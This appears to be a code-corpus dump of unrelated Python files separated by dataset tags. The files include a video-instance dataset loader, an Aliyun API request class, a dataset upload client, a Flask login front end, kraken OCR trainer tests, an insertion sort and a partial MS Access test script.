'elephant', 'snowboard', 'boat', 'shark', 'mouse', 'frog', 'eagle', 'earless_seal',
'tennis_racket')
def __init__(self,
ann_file,
img_prefix,
img_scale,
img_norm_cfg,
size_divisor=None,
proposal_file=None,
num_max_proposals=1000,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True,
with_track=False,
with_prop=False,
with_semantic_seg=False,
seg_scale_factor=1,
extra_aug=None,
cutblur=None,
cutnoise=None,
instaboost=None,
aug_ref_bbox_param=None,
resize_keep_ratio=True,
test_mode=False):
# prefix of images path
self.img_prefix = img_prefix
# load annotations (and proposals)
self.vid_infos = self.load_annotations(ann_file)
img_ids = []
for idx, vid_info in enumerate(self.vid_infos):
for frame_id in range(len(vid_info['filenames'])):
img_ids.append((idx, frame_id))
self.img_ids = img_ids
if proposal_file is not None:
self.proposals = self.load_proposals(proposal_file)
else:
self.proposals = None
# filter images with no annotation during training
if not test_mode:
valid_inds = [i for i, (v, f) in enumerate(self.img_ids)
if len(self.get_ann_info(v, f)['bboxes'])]
self.img_ids = [self.img_ids[i] for i in valid_inds]
# (long_edge, short_edge) or [(long1, short1), (long2, short2), ...]
self.img_scales = img_scale if isinstance(img_scale,
list) else [img_scale]
assert mmcv.is_list_of(self.img_scales, tuple)
# normalization configs
self.img_norm_cfg = img_norm_cfg
# max proposals per image
self.num_max_proposals = num_max_proposals
# flip ratio
self.flip_ratio = flip_ratio
assert flip_ratio >= 0 and flip_ratio <= 1
# padding border to ensure the image size can be divided by
# size_divisor (used for FPN)
self.size_divisor = size_divisor
# with mask or not (reserved field, takes no effect)
self.with_mask = with_mask
# some datasets provide bbox annotations as ignore/crowd/difficult,
# if `with_crowd` is True, then these info is returned.
self.with_crowd = with_crowd
# with label is False for RPN
self.with_label = with_label
self.with_track = with_track
self.with_prop = with_prop
self.with_seg = with_semantic_seg
# rescale factor for segmentation maps
self.seg_scale_factor = seg_scale_factor
# params for augmenting bbox in the reference frame
self.aug_ref_bbox_param = aug_ref_bbox_param
# in test mode or not
self.test_mode = test_mode
# set group flag for the sampler
if not self.test_mode:
self._set_group_flag()
# transforms
self.img_transform = ImageTransform(
size_divisor=self.size_divisor, **self.img_norm_cfg)
self.bbox_transform = BboxTransform()
self.mask_transform = MaskTransform()
self.seg_transform = SegMapTransform(self.size_divisor)
self.numpy2tensor = Numpy2Tensor()
# if use extra augmentation
if extra_aug is not None:
self.extra_aug = ExtraAugmentation(**extra_aug)
else:
self.extra_aug = None
# with cutBlur augmentation or not
self.cutblur = CutBlur(**cutblur) if cutblur else None
# with cutNoise augmentation or not
self.cutnoise = CutNoise(**{**cutnoise, **img_norm_cfg}) if cutnoise else None
# with instaboost augmentation or not
self.instaboost = InstaBoost(**instaboost) if instaboost else None
# image rescale if keep ratio
self.resize_keep_ratio = resize_keep_ratio
def __len__(self):
return len(self.img_ids)
def __getitem__(self, idx):
if self.test_mode:
return self.prepare_test_img(self.img_ids[idx])
data = self.prepare_train_img(self.img_ids[idx])
return data
def load_annotations(self, ann_file):
self.ytvos = YTVOS(ann_file)
self.cat_ids = self.ytvos.getCatIds()
self.cat2label = {
cat_id: i + 1
for i, cat_id in enumerate(self.cat_ids)
}
self.vid_ids = self.ytvos.getVidIds()
vid_infos = []
for i in self.vid_ids:
info = self.ytvos.loadVids([i])[0]
info['filenames'] = info['file_names']
vid_infos.append(info)
return vid_infos
def get_ann_info(self, idx, frame_id):
vid_id = self.vid_infos[idx]['id']
ann_ids = self.ytvos.getAnnIds(vidIds=[vid_id])
ann_info = self.ytvos.loadAnns(ann_ids)
return self._parse_ann_info(ann_info, frame_id)
def _set_group_flag(self):
"""Set flag according to image aspect ratio.
Images with aspect ratio greater than 1 will be set as group 1,
otherwise group 0.
"""
self.flag = np.zeros(len(self), dtype=np.uint8)
for i in range(len(self)):
vid_id, _ = self.img_ids[i]
vid_info = self.vid_infos[vid_id]
if vid_info['width'] / vid_info['height'] > 1:
self.flag[i] = 1
def bbox_aug(self, bbox, img_size):
assert self.aug_ref_bbox_param is not None
center_off = self.aug_ref_bbox_param[0]
size_perturb = self.aug_ref_bbox_param[1]
n_bb = bbox.shape[0]
# bbox center offset
center_offs = (2*np.random.rand(n_bb, 2) - 1) * center_off
# bbox resize ratios
resize_ratios = (2*np.random.rand(n_bb, 2) - 1) * size_perturb + 1
# bbox: x1, y1, x2, y2
centers = (bbox[:, :2] + bbox[:, 2:])/2.
sizes = bbox[:, 2:] - bbox[:, :2]
new_centers = centers + center_offs * sizes
new_sizes = sizes * resize_ratios
new_x1y1 = new_centers - new_sizes/2.
new_x2y2 = new_centers + new_sizes/2.
c_min = [0, 0]
c_max = [img_size[1], img_size[0]]
new_x1y1 = np.clip(new_x1y1, c_min, c_max)
new_x2y2 = np.clip(new_x2y2, c_min, c_max)
bbox = np.hstack((new_x1y1, new_x2y2)).astype(np.float32)
return bbox
def sample_ref(self, idx):
# sample another frame in the same sequence as reference
vid, frame_id = idx
vid_info = self.vid_infos[vid]
sample_range = range(len(vid_info['filenames']))
valid_samples = []
for i in sample_range:
# check if the frame id is valid
ref_idx = (vid, i)
if i != frame_id and ref_idx in self.img_ids:
valid_samples.append(ref_idx)
assert len(valid_samples) > 0
return random.choice(valid_samples)
def prepare_train_img(self, idx):
# prepare a pair of image in a sequence
vid, frame_id = idx
vid_info = self.vid_infos[vid]
# load image
img = mmcv.imread(
osp.join(self.img_prefix, vid_info['filenames'][frame_id]))
basename = osp.basename(vid_info['filenames'][frame_id])
_, ref_frame_id = self.sample_ref(idx)
ref_img = mmcv.imread(
osp.join(self.img_prefix, vid_info['filenames'][ref_frame_id]))
# load proposals if necessary
if self.proposals is not None:
proposals = self.proposals[idx][:self.num_max_proposals]
# TODO: Handle empty proposals properly. Currently images with
# no proposals are just ignored, but they can be used for
# training in concept.
if len(proposals) == 0:
return None
if not (proposals.shape[1] == 4 or proposals.shape[1] == 5):
raise AssertionError(
'proposals should have shapes (n, 4) or (n, 5), '
'but found {}'.format(proposals.shape))
if proposals.shape[1] == 5:
scores = proposals[:, 4, None]
proposals = proposals[:, :4]
else:
scores = None
# According to this blog post (https://www.sicara.ai/blog/2019-01-28-how-computer-generate-random-numbers):
# we need to be careful when using numpy.random in multiprocess application as it can always generate the
# same output for different processes. Therefore we use np.random.RandomState().
random_state = np.random.RandomState()
ann = self.get_ann_info(vid, frame_id)
# instaboost augmentation
if self.instaboost is not None:
img, ann = self.instaboost({'img': img, 'ann_info': ann},
random_state=random_state).values()
ref_ann = self.get_ann_info(vid, ref_frame_id)
gt_bboxes = ann['bboxes']
gt_labels = ann['labels']
ref_bboxes = ref_ann['bboxes']
# obj ids attribute does not exist in current annotation
# need to add it
ref_ids = ref_ann['obj_ids']
gt_ids = ann['obj_ids']
# compute matching of reference frame with current frame
# 0 denote there is no matching
gt_pids = [ref_ids.index(i)+1 if i in ref_ids else 0 for i in gt_ids]
if self.with_crowd:
gt_bboxes_ignore = ann['bboxes_ignore']
# extra augmentation
if self.extra_aug is not None:
img, gt_bboxes, gt_labels = self.extra_aug(img, gt_bboxes,
gt_labels)
# apply transforms
flip = True if random_state.rand() < self.flip_ratio else False
img_scale = random_scale(self.img_scales) # sample a scale
img, img_shape, pad_shape, scale_factor = self.img_transform(
img, img_scale, flip, keep_ratio=self.resize_keep_ratio)
ref_img, ref_img_shape, _, ref_scale_factor = self.img_transform(
ref_img, img_scale, flip, keep_ratio=self.resize_keep_ratio)
# CutBlur augmentation
if self.cutblur is not None:
if random_state.rand() < self.cutblur.p:
img, gt_labels = self.cutblur({'image': img, 'label': gt_labels},
random_state=random_state).values()
ref_img, _ = self.cutblur({'image': ref_img, 'label': ref_ann['labels']},
random_state=random_state).values()
# CutNoise augmentation
if self.cutnoise is not None:
if random_state.rand() < self.cutnoise.p:
img, gt_labels = self.cutnoise({'image': img, 'label': gt_labels},
random_state=random_state)
ref_img, _ = self.cutblur({'image': ref_img, 'label': ref_ann['labels']},
random_state=random_state).values()
img = img.copy()
ref_img = ref_img.copy()
if self.proposals is not None:
proposals = self.bbox_transform(proposals, img_shape, scale_factor,
flip)
proposals = np.hstack(
[proposals, scores]) if scores is not None else proposals
gt_bboxes = self.bbox_transform(gt_bboxes, img_shape,
scale_factor, flip)
ref_bboxes = self.bbox_transform(ref_bboxes, ref_img_shape,
ref_scale_factor, flip)
if self.aug_ref_bbox_param is not None:
ref_bboxes = self.bbox_aug(ref_bboxes, ref_img_shape)
if self.with_crowd:
gt_bboxes_ignore = self.bbox_transform(gt_bboxes_ignore, img_shape,
scale_factor, flip)
if self.with_mask:
gt_masks = self.mask_transform(ann['masks'], pad_shape,
scale_factor, flip)
if self.with_prop:
ref_masks = self.mask_transform(ref_ann['masks'], pad_shape,
ref_scale_factor, flip)
if self.with_seg:
gt_seg = np.zeros((vid_info['height'], vid_info['width']), dtype=np.uint8)
for (label, mask) in zip(ann['labels'], ann['masks']):
gt_seg += mask * label
gt_seg = self.seg_transform(gt_seg, img_scale, flip)
gt_seg = mmcv.imrescale(
gt_seg, self.seg_scale_factor, interpolation='nearest')
gt_seg = gt_seg[None, ...]
ori_shape = (vid_info['height'], vid_info['width'], 3)
img_meta = dict(
ori_shape=ori_shape,
img_shape=img_shape,
pad_shape=pad_shape,
scale_factor=scale_factor,
flip=flip)
data = dict(
img=DC(to_tensor(img), stack=True),
ref_img=DC(to_tensor(ref_img), stack=True),
img_meta=DC(img_meta, cpu_only=True),
gt_bboxes=DC(to_tensor(gt_bboxes)),
ref_bboxes=DC(to_tensor(ref_bboxes))
)
if self.proposals is not None:
data['proposals'] = DC(to_tensor(proposals))
if self.with_label:
data['gt_labels'] = DC(to_tensor(gt_labels))
if self.with_track:
data['gt_pids'] = DC(to_tensor(gt_pids))
if self.with_crowd:
data['gt_bboxes_ignore'] = DC(to_tensor(gt_bboxes_ignore))
if self.with_mask:
data['gt_masks'] = DC(gt_masks, cpu_only=True)
if self.with_prop:
data['ref_masks'] = DC(ref_masks, cpu_only=True)
if self.with_seg:
data['gt_semantic_seg'] = DC(to_tensor(gt_seg), stack=True)
return data
def prepare_test_img(self, idx):
"""Prepare an image for testing (multi-scale and flipping)"""
vid, frame_id = idx
vid_info = self.vid_infos[vid]
img = mmcv.imread(
osp.join(self.img_prefix, vid_info['filenames'][frame_id]))
proposal = None
def prepare_single(img, frame_id, scale, flip, proposal=None):
_img, img_shape, pad_shape, scale_factor = self.img_transform(
img, scale, flip, keep_ratio=self.resize_keep_ratio)
_img = to_tensor(_img)
_img_meta = dict(
ori_shape=(vid_info['height'], vid_info['width'], 3),
img_shape=img_shape,
pad_shape=pad_shape,
is_first=(frame_id == 0),
video_id=vid,
frame_id=frame_id,
scale_factor=scale_factor,
flip=flip)
if proposal is not None:
if proposal.shape[1] == 5:
score = proposal[:, 4, None]
proposal = proposal[:, :4]
else:
score = None
_proposal = self.bbox_transform(proposal, img_shape,
scale_factor, flip)
_proposal = np.hstack(
[_proposal, score]) if score is not None else _proposal
_proposal = to_tensor(_proposal)
else:
_proposal = None
return _img, _img_meta, _proposal
imgs = []
img_metas = []
proposals = []
for scale in self.img_scales:
_img, _img_meta, _proposal = prepare_single(
img, frame_id, scale, False, proposal)
imgs.append(_img)
img_metas.append(DC(_img_meta, cpu_only=True))
proposals.append(_proposal)
if self.flip_ratio > 0:
_img, _img_meta, _proposal = prepare_single(
img, scale, True, proposal)
imgs.append(_img)
img_metas.append(DC(_img_meta, cpu_only=True))
proposals.append(_proposal)
data = dict(img=imgs, img_meta=img_metas)
return data
def _parse_ann_info(self, ann_info, frame_id, with_mask=True):
"""Parse bbox and mask annotation.
Args:
ann_info (list[dict]): Annotation info of an image.
with_mask (bool): Whether to parse mask annotations.
Returns:
dict: A dict containing the following keys: bboxes, bboxes_ignore,
labels, masks, mask_polys, poly_lens.
"""
gt_bboxes = []
gt_labels = []
gt_ids = []
gt_bboxes_ignore = []
# Two formats are provided.
# 1. mask: a binary map of the same size of the image.
# 2. polys: each mask consists of one or several polys, each poly is a
# list of float.
if with_mask:
gt_masks = []
gt_mask_polys = []
gt_poly_lens = []
for i, ann in enumerate(ann_info):
# each ann is a list of masks
# ann:
# bbox: list of bboxes
# segmentation: list of segmentation
# category_id
# area: list of area
bbox = ann['bboxes'][frame_id]
area = ann['areas'][frame_id]
segm = ann['segmentations'][frame_id]
if bbox is None:
continue
x1, y1, w, h = bbox
if area <= 0 or w < 1 or h < 1:
continue
bbox = [x1, y1, x1 + w - 1, y1 + h - 1]
if ann['iscrowd']:
gt_bboxes_ignore.append(bbox)
else:
gt_bboxes.append(bbox)
gt_ids.append(ann['id'])
gt_labels.append(self.cat2label[ann['category_id']])
if with_mask:
gt_masks.append(self.ytvos.annToMask(ann, frame_id))
# mask_polys = [
# p for p in segm if len(p) >= 6
# ] # valid polygons have >= 3 points (6 coordinates)
mask_polys = segm
poly_lens = [len(p) for p in mask_polys]
gt_mask_polys.append(mask_polys)
gt_poly_lens.extend(poly_lens)
if gt_bboxes:
gt_bboxes = np.array(gt_bboxes, dtype=np.float32)
gt_labels = np.array(gt_labels, dtype=np.int64)
else:
gt_bboxes = np.zeros((0, 4), dtype=np.float32)
gt_labels = np.array([], dtype=np.int64)
if gt_bboxes_ignore:
gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)
else:
gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)
ann = dict(
bboxes=gt_bboxes, labels=gt_labels, obj_ids=gt_ids, bboxes_ignore=gt_bboxes_ignore)
if with_mask:
ann['masks'] = gt_masks
# poly format is not used in the current implementation
ann['mask_polys'] = gt_mask_polys
ann['poly_lens'] = gt_poly_lens
return ann
| StarcoderdataPython |
271224 | <filename>aliyun/api/rest/Rds20140815DescribeTasksRequest.py
'''
Created by auto_sdk on 2015.06.23
'''
from aliyun.api.base import RestApi
class Rds20140815DescribeTasksRequest(RestApi):
def __init__(self,domain='rds.aliyuncs.com',port=80):
RestApi.__init__(self,domain, port)
self.DBInstanceId = None
self.EndTime = None
self.Page = None
self.PageSize = None
self.StartTime = None
self.Status = None
self.TaskAction = None
self.ownerId = None
self.resourceOwnerAccount = None
self.resourceOwnerId = None
def getapiname(self):
return 'rds.aliyuncs.com.DescribeTasks.2014-08-15'
| StarcoderdataPython |
6458638 | <reponame>alexandersjoberg/sidekick
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from enum import Enum
from pathlib import Path
from typing import Dict, List
import requests
from requests.adapters import HTTPAdapter
from tqdm import tqdm
class Status(Enum):
PROCESSING = 1
SUCCESS = 2
FAILED = 3
class UploadJob:
def __init__(
self, upload_id: str, status: Status, message: str
) -> None:
self.id = upload_id
self.status = status
self.message = message
@classmethod
def from_dict(cls, data):
return cls(
upload_id=data['uploadId'],
status=Status[data['status']],
message=data.get('message'),
)
class DatasetClient:
"""Client for the Dataset API."""
_MAX_RETRIES = 3
_EXTENSION_MAPPING = {
'.csv': 'text/csv',
'.zip': 'application/zip',
'.npy': 'application/npy',
}
VALID_EXTENSIONS = set(_EXTENSION_MAPPING.keys())
def __init__(self, url: str, token: str) -> None:
self.url = url.rstrip('/')
self._session = requests.Session()
self._session.mount('', HTTPAdapter(max_retries=self._MAX_RETRIES))
self._session.headers.update(
{
'Authorization': 'Bearer %s' % token,
'User-Agent': 'sidekick',
}
)
def upload_data(
self,
filepaths: List[str],
name: str = 'Sidekick upload',
description: str = 'Sidekick upload',
progress: bool = True,
) -> None:
"""Creates a dataset and uploads files to it.
Args:
filepaths: List of files to upload to the dataset.
name: Name of the dataset.
description: Description of the dataset.
progress: Print progress.
Raises:
FileNotFoundError: One or more filepaths not found.
ValueError: One or more files have a non supported extension.
IOError: Error occurred while saving files in dataset.
"""
paths = [Path(str(path)).resolve() for path in filepaths]
self._validate_paths(paths)
wrapper_id = self._create_wrapper(name, description)
jobs_mapping = self._stage_files(paths, wrapper_id, progress)
self._wait_until_completed(wrapper_id, jobs_mapping, progress)
self._complete_upload(wrapper_id)
def _create_wrapper(self, name: str, description: str) -> str:
response = self._session.post(
url=self.url,
headers={'Content-Type': 'application/json'},
json={'name': name, 'description': description}
)
response.raise_for_status()
return response.json()['datasetWrapperId']
def _get_status(self, wrapper_id: str) -> List[UploadJob]:
response = self._session.get(
url=self.url + '/%s/uploads' % wrapper_id,
)
response.raise_for_status()
jobs = response.json()['uploadStatuses']
return [UploadJob.from_dict(job) for job in jobs]
def _complete_upload(self, wrapper_id: str) -> None:
response = self._session.post(
url=self.url + '/%s/upload_complete' % wrapper_id,
headers={'Content-Type': 'application/json'}
)
response.raise_for_status()
def _stage_files(
self, filepaths: List[Path], wrapper_id: str, progress: bool,
) -> Dict[str, Path]:
num_files = len(filepaths)
status_bar = tqdm(
total=num_files,
unit='file',
desc='Uploading files',
disable=not progress,
)
workers = min(10, num_files)
with ThreadPoolExecutor(max_workers=workers) as pool:
future_to_path = {
pool.submit(self._stage_file, path, wrapper_id): path
for path in filepaths
}
job_mapping = []
for future in as_completed(future_to_path):
path = future_to_path[future]
job_id = future.result()
job_mapping.append((job_id, path))
status_bar.update()
status_bar.close()
return dict(job_mapping)
def _stage_file(self, filepath: Path, wrapper_id: str) -> str:
content_type = self._EXTENSION_MAPPING[filepath.suffix]
with filepath.open('rb') as file:
data = file.read()
response = self._session.post(
url=self.url + '/%s/upload' % wrapper_id,
headers={'Content-Type': content_type},
data=data
)
response.raise_for_status()
return response.json()['uploadId']
def _validate_paths(self, paths: List[Path]) -> None:
"""Validates that paths exist and have a supported extension."""
not_found = [str(path) for path in paths if not path.exists()]
if not_found:
raise FileNotFoundError('Files not found: %s' % set(not_found))
invalid_extension = [
str(path) for path in paths
if path.suffix not in self.VALID_EXTENSIONS
]
if invalid_extension:
raise ValueError(
'Valid extensions: %s. Given: %s' % (
self.VALID_EXTENSIONS, set(invalid_extension))
)
def _wait_until_completed(
self, wrapper_id: str, job_mapping: Dict[str, Path], progress: bool,
) -> None:
"""Waits until all jobs are saved."""
status_bar = tqdm(
total=len(job_mapping),
unit='file',
desc='Saving files',
disable=not progress,
)
ongoing = True
successful_jobs = [] # type: List[str]
while ongoing:
ongoing = False
jobs = self._get_status(wrapper_id)
for job in jobs:
if job.status is Status.FAILED:
raise IOError(
'Error saving file: %s, message: %s' % (
job_mapping[job.id], job.message
)
)
elif job.status is Status.SUCCESS:
if job.id not in successful_jobs:
successful_jobs.append(job.id)
status_bar.update()
else: # status is PROCESSING:
ongoing = True
if ongoing:
time.sleep(1)
status_bar.close()
| StarcoderdataPython |
1610911 | #!/usr/bin/python3
"""
Flask App that integrates with AirBnB static HTML Template
"""
from flask import Flask, render_template, request, url_for
import json
from models import storage
import requests
from uuid import uuid4
# flask setup
app = Flask(__name__)
app.url_map.strict_slashes = False
port = 8000
host = '0.0.0.0'
# begin flask page rendering
@app.teardown_appcontext
def teardown_db(exception):
"""
after each request, this method calls .close() (i.e. .remove()) on
the current SQLAlchemy Session
"""
storage.close()
@app.route('/', methods=['GET', 'POST'])
def main_index():
"""
handles request to main index, currently a login page
"""
cache_id = uuid4()
if request.method == 'GET':
return render_template('index.html', cache_id=cache_id, message=None)
if request.method == 'POST':
email = request.form.get('email', None)
password = request.form.get('password', None)
payload = {
'email': email,
'password': password
}
headers = {
'content-type': 'application/json'
}
action = request.form.get('action')
if action == 'login':
url = 'http://0.0.0.0:5001/auth/login'
elif action == 'signup':
url = 'http://0.0.0.0:5001/auth/register'
else:
auth_token = request.form.get('logout')
return logout(auth_token=auth_token)
r = requests.post(url, headers=headers,
data=json.dumps(payload))
r_data = r.json()
if r_data.get('error'):
return render_template('index.html',
cache_id=cache_id,
message=r_data.get('error'))
auth_token = r_data.get('auth_token')
if auth_token is None:
return render_template('index.html',
cache_id=cache_id,
message=r_data.get('error'))
if 'register' in url:
signup_message = 'thank you for signing up'
return render_template('index.html',
cache_id=cache_id,
message=signup_message)
state_objs = storage.all('State').values()
states = dict([state.name, state] for state in state_objs)
amens = list(storage.all('Amenity').values())
cache_id = uuid4()
return render_template('places.html', cache_id=cache_id, states=states,
amens=amens, auth_token=auth_token)
@app.route('/logout', methods=['GET', 'POST'])
def logout(auth_token=None):
"""
handles request to main index, currently a login page
"""
if request.method == 'GET':
cache_id =uuid4()
return render_template('404.html', cache_id=cache_id), 404
cache_id = uuid4()
if auth_token is None:
auth_token = request.form.get('logout')
headers = {
'content-type': 'application/json',
'Authorization': 'Bearer {}'.format(auth_token)
}
url = 'http://0.0.0.0:5001/auth/logout'
r = requests.post(url, headers=headers)
r_data = r.json()
if r_data.get('error'):
return render_template('index.html',
cache_id=cach_id,
message=r_data.get('error'))
message = 'You are now logged out.'
cache_id = uuid4()
return render_template('index.html',
cache_id=cache_id,
message=message)
@app.errorhandler(404)
def page_not_found(error):
"""
404 Error Handler
"""
cache_id = uuid4()
return render_template('404.html', cache_id=cache_id), 404
if __name__ == "__main__":
"""
MAIN Flask App
"""
app.run(host=host, port=port)
| StarcoderdataPython |
11264205 | # -*- coding: utf-8 -*-
import unittest
import json
import kraken
from pytest import raises
from pathlib import Path
from kraken.lib import xml
from kraken.lib.train import KrakenTrainer, RecognitionModel, SegmentationModel
from kraken.lib.exceptions import KrakenInputException
thisfile = Path(__file__).resolve().parent
resources = thisfile / 'resources'
class TestKrakenTrainer(unittest.TestCase):
"""
Tests for KrakenTrainer class
"""
def setUp(self):
self.xml = resources / '170025120000003,0074.xml'
self.bls = xml.parse_page(self.xml)
self.box_lines = [resources / '000236.png']
self.model = resources / 'model_small.mlmodel'
def test_krakentrainer_rec_box_load_fail(self):
training_data = self.box_lines
evaluation_data = self.box_lines
module = RecognitionModel(format_type='path',
model=self.model,
training_data=training_data,
evaluation_data=evaluation_data,
resize='fail')
with raises(KrakenInputException):
module.setup()
def test_krakentrainer_rec_bl_load_fail(self):
"""
Tests that the proper exception is raised when loading model not fitting the dataset.
"""
training_data = [self.xml]
evaluation_data = [self.xml]
module = RecognitionModel(format_type='xml',
model=self.model,
training_data=training_data,
evaluation_data=evaluation_data,
resize='fail')
with raises(KrakenInputException):
module.setup()
def test_krakentrainer_rec_box_load_add(self):
"""
Tests that adaptation works in add mode.
"""
training_data = self.box_lines
evaluation_data = self.box_lines
module = RecognitionModel(format_type='path',
model=self.model,
training_data=training_data,
evaluation_data=evaluation_data,
resize='add')
module.setup()
self.assertEqual(module.nn.seg_type, 'bbox')
self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.GroundTruthDataset)
trainer = KrakenTrainer(max_steps=1)
self.assertEqual(module.nn.named_spec[-1].split("c")[-1], '19')
def test_krakentrainer_rec_box_load_both(self):
"""
Tests that adaptation works in both mode.
"""
training_data = self.box_lines
evaluation_data = self.box_lines
module = RecognitionModel(format_type='path',
model=self.model,
training_data=training_data,
evaluation_data=evaluation_data,
resize='both')
module.setup()
self.assertEqual(module.nn.seg_type, 'bbox')
self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.GroundTruthDataset)
trainer = KrakenTrainer(max_steps=1)
self.assertEqual(module.nn.named_spec[-1].split("c")[-1], '16')
def test_krakentrainer_rec_box_append(self):
"""
Tests that appending new layers onto a loaded model works.
"""
training_data = self.box_lines
evaluation_data = self.box_lines
module = RecognitionModel(format_type='path',
model=self.model,
append=1,
spec='[Cr4,4,32]',
training_data=training_data,
evaluation_data=evaluation_data)
module.setup()
self.assertEqual(module.nn.seg_type, 'bbox')
self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.GroundTruthDataset)
self.assertTrue(module.nn.spec.startswith('[1,48,0,1 Cr{C_0}4,2,1,4,2 Cr{C_1}4,4,32 O{O_2}'))
trainer = KrakenTrainer(max_steps=1)
def test_krakentrainer_rec_bl_load(self):
training_data = [self.xml]
evaluation_data = [self.xml]
module = RecognitionModel(format_type='xml',
model=self.model,
training_data=training_data,
evaluation_data=evaluation_data,
resize='fail')
with raises(KrakenInputException):
module.setup()
def test_krakentrainer_rec_bl_load_add(self):
training_data = [self.xml]
evaluation_data = [self.xml]
module = RecognitionModel(format_type='xml',
model=self.model,
training_data=training_data,
evaluation_data=evaluation_data,
resize='add')
module.setup()
self.assertEqual(module.nn.seg_type, 'baselines')
self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.PolygonGTDataset)
trainer = KrakenTrainer(max_steps=1)
self.assertEqual(module.nn.named_spec[-1].split("c")[-1], '60')
def test_krakentrainer_rec_bl_load_both(self):
training_data = [self.xml]
evaluation_data = [self.xml]
module = RecognitionModel(format_type='xml',
model=self.model,
training_data=training_data,
evaluation_data=evaluation_data,
resize='both')
module.setup()
self.assertEqual(module.nn.seg_type, 'baselines')
self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.PolygonGTDataset)
trainer = KrakenTrainer(max_steps=1)
self.assertEqual(module.nn.named_spec[-1].split("c")[-1], '60')
def test_krakentrainer_rec_bl_append(self):
training_data = [self.xml]
evaluation_data = [self.xml]
module = RecognitionModel(format_type='xml',
model=self.model,
append=1,
spec='[Cr4,4,32]',
training_data=training_data,
evaluation_data=evaluation_data)
module.setup()
self.assertEqual(module.nn.seg_type, 'baselines')
self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.PolygonGTDataset)
self.assertTrue(module.nn.spec.startswith('[1,48,0,1 Cr{C_0}4,2,1,4,2 Cr{C_1}4,4,32 O{O_2}'))
trainer = KrakenTrainer(max_steps=1)
def test_krakentrainer_rec_box_path(self):
"""
Tests recognition trainer constructor with legacy path training data.
"""
training_data = self.box_lines
evaluation_data = self.box_lines
module = RecognitionModel(format_type='path',
training_data=training_data,
evaluation_data=evaluation_data)
module.setup()
self.assertEqual(module.nn.seg_type, 'bbox')
self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.GroundTruthDataset)
trainer = KrakenTrainer(max_steps=1)
def test_krakentrainer_rec_bl_xml(self):
"""
Tests recognition trainer constructor with XML training data.
"""
training_data = [self.xml]
evaluation_data = [self.xml]
module = RecognitionModel(format_type='xml',
training_data=training_data,
evaluation_data=evaluation_data)
module.setup()
self.assertEqual(module.nn.seg_type, 'baselines')
self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.PolygonGTDataset)
self.assertEqual(len(module.train_set.dataset), 44)
self.assertEqual(len(module.val_set.dataset), 44)
trainer = KrakenTrainer(max_steps=1)
def test_krakentrainer_rec_bl_dict(self):
"""
Tests recognition trainer constructor with dictionary style training data.
"""
training_data = [{'image': resources / 'bw.png', 'text': 'foo', 'baseline': [[10, 10], [300, 10]], 'boundary': [[10, 5], [300, 5], [300, 15], [10, 15]]}]
evaluation_data = [{'image': resources / 'bw.png', 'text': 'foo', 'baseline': [[10, 10], [300, 10]], 'boundary': [[10, 5], [300, 5], [300, 15], [10, 15]]}]
module = RecognitionModel(format_type=None,
training_data=training_data,
evaluation_data=evaluation_data)
module.setup()
self.assertEqual(module.nn.seg_type, 'baselines')
self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.PolygonGTDataset)
trainer = KrakenTrainer(max_steps=1)
| StarcoderdataPython |
3324171 | <gh_stars>0
from flask import Flask, Blueprint, render_template, abort, g, request
privacy_policy = Blueprint("privacy_policy", __name__)
@privacy_policy.route('/')
def loadTerms():
return render_template('/privacy_policy/index.html')
| StarcoderdataPython |
4829526 | # This script will implement the INSERTION-SORT
# from the Algorithms (MIT) book
#####################################################|
#IMPORTS |
#____________________________________________________|
from random import shuffle
#####################################################|
#FUNCTIONS |
#____________________________________________________|
#####################################################|
#DATA |
#____________________________________________________|
A = range(-10,50)
shuffle(A)
print A
#####################################################|
#BODY OF SCRIPT |
#____________________________________________________|
for j in xrange(1,len(A)):
key = A[j]
#Insert A[j] into the sorted sequence A[1... j-1]
i = j - 1
while (i>-1) and A[i] > key: #Flip the second inequality and you will get a largest to smallest sequence
A[i+1] = A[i]
i = i -1
A[i+1] = key
print A
| StarcoderdataPython |
8055460 | <reponame>zuhorski/EPL_Project
#
# This assumes that you have MSAccess and DAO installed.
# You need to run makepy.py over "msaccess.tlb" and
# "dao3032.dll", and ensure the generated files are on the
# path.
# You can run this with no args, and a test database will be generated.
# You can optionally pass a dbname on the command line, in which case it will be dumped.
import pythoncom
from win32com.client import gencache, constants, Dispatch
import win32api
import os, sys
def CreateTestAccessDatabase(dbname = None):
# Creates a test access database - returns the filename.
if dbname is None:
dbname = os.path.join( win32api.GetTempPath(), "COMTestSuiteTempDatabase.mdb" )
access = Dispatch("Access.Application")
dbEngine = access.DBEngine
workspace = dbEngine.Workspaces(0)
try:
os.unlink(dbname)
except os.error:
print("WARNING - Unable to delete old test database - expect a COM exception RSN!")
newdb = workspace.CreateDatabase( dbname, constants.dbLangGeneral, constants.dbEncrypt )
# Create one test table.
table = newdb.CreateTableDef("Test Table 1")
table.Fields.Append( table.CreateField("First Name", constants.dbText ) )
table.Fields.Append( table.CreateField("Last Name", constants.dbText ) )
index = table.CreateIndex("UniqueIndex")
index.Fields.Append( index.CreateField("First Name") )
index.Fields.Append( index.CreateField("Last Name") )
index.Unique = -1
table.Indexes.Append(index)
newdb.TableDefs.Append( table )
# Create a second test table.
table = newdb.CreateTableDef("Test Table 2")
table.Fields.Append( table.CreateField("First Name", constants.dbText ) )
table.Fields.Append( table.CreateField("Last Name", constants.dbText ) )
newdb.TableDefs.Append( table )
# Create a relationship between them
relation = newdb.CreateRelation("TestRelationship")
relation.Table = "Test Table 1"
relation.ForeignTable = "Test Table 2"
field = relation.CreateField("<NAME>")
field.ForeignName = "<NAME>"
relation.Fields.Append( field )
field = relation.CreateField("<NAME>")
field.ForeignName = "<NAME>"
relation.Fields.Append( field )
relation.Attributes = constants.dbRelationDeleteCascade + constants.dbRelationUpdateCascade
newdb.Relations.Append(relation)
# Finally we can add some data to the table.
tab1 = newdb.OpenRecordset("Test Table 1")
